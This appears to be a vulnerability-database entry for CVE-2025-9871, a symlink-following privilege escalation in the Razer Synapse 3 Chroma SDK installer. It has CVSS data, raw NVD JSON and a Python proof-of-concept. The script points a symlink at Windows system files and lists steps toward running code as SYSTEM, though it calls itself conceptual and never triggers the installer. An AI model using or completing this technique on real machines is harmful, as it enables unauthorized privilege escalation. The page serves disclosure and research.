Security Vulnerability Report
中文
CVE-2025-9871 CVSS 7.8 HIGH

CVE-2025-9871

Published: 2025-10-29 20:15:37
Last Modified: 2025-11-06 19:34:28
Source: [email protected]

Description

Razer Synapse 3 Chroma Connect Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Razer Synapse 3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Razer Chroma SDK installer. By creating a symbolic link, an attacker can abuse the installer to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-26373.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:razer:synapse:*:*:*:*:*:*:*:* - VULNERABLE
Razer Synapse 3 < 3.x.x (all versions with vulnerable Chroma SDK installer)
Razer Chroma SDK Installer (versions with symlink handling vulnerability)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9871 PoC - Symbolic Link Following in Razer Chroma SDK Installer # Target: Delete arbitrary files via installer symlink abuse # Note: This is a conceptual PoC for educational purposes only import os import sys import subprocess import shutil def create_malicious_symlink(target_path, link_path): """ Create a symbolic link that points to a target file/directory This PoC demonstrates the symlink abuse technique """ try: if os.path.exists(link_path): os.remove(link_path) os.symlink(target_path, link_path) print(f"[+] Symlink created: {link_path} -> {target_path}") return True except Exception as e: print(f"[-] Failed to create symlink: {e}") return False def exploit_installer(): """ Simulated exploitation flow: 1. Identify Razer Chroma SDK installer process 2. Create symlink to target system file 3. Trigger installer to follow symlink and modify target 4. Escalate privileges via modified file """ # Target paths that could be abused target_files = [ r"C:\Windows\System32\config\SYSTEM", r"C:\Windows\System32\drivers\etc\hosts", r"C:\ProgramData\Microsoft\Windows\WER\ReportQueue" ] # Malicious symlink location (in installer writable area) symlink_location = r"C:\Program Files\Razer\ChromaConnect\temp\link" print("[*] CVE-2025-9871 Symlink Following Attack Simulation") print("[*] Target: Razer Chroma SDK Installer") for target in target_files: if os.path.exists(target): print(f"\n[*] Targeting: {target}") if create_malicious_symlink(target, symlink_location): print("[+] Symlink abuse vector established") print("[+] Waiting for installer to follow symlink...") break def cleanup(): """Clean up symlink artifacts""" symlink_location = r"C:\Program Files\Razer\ChromaConnect\temp\link" if os.path.islink(symlink_location): os.remove(symlink_location) print("[*] Cleanup completed") if __name__ == "__main__": print("CVE-2025-9871 Razer Synapse 3 Chroma Connect LPE PoC") print("=" * 60) print("WARNING: For authorized security testing only") print("=" * 60) if len(sys.argv) > 1 and sys.argv[1] == "--exploit": exploit_installer() else: print("\nUsage: python cve-2025-9871.py --exploit") print("\nThis PoC demonstrates the symlink following vulnerability") print("in Razer Chroma SDK installer. In real attack:") print("1. Obtain low-privileged code execution") print("2. Create symlinks in installer temp directory") print("3. Trigger installer to follow symlinks") print("4. Delete/replace privileged files") print("5. Execute code as SYSTEM")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9871", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:37.237", "lastModified": "2025-11-06T19:34:28.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Razer Synapse 3 Chroma Connect Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Razer Synapse 3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Razer Chroma SDK installer. By creating a symbolic link, an attacker can abuse the installer to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-26373."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:razer:synapse:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.10.730.71519", "matchCriteriaId": "3EF1AF2E-84DF-4252-B5F7-DB4DACFBA510"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-920/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.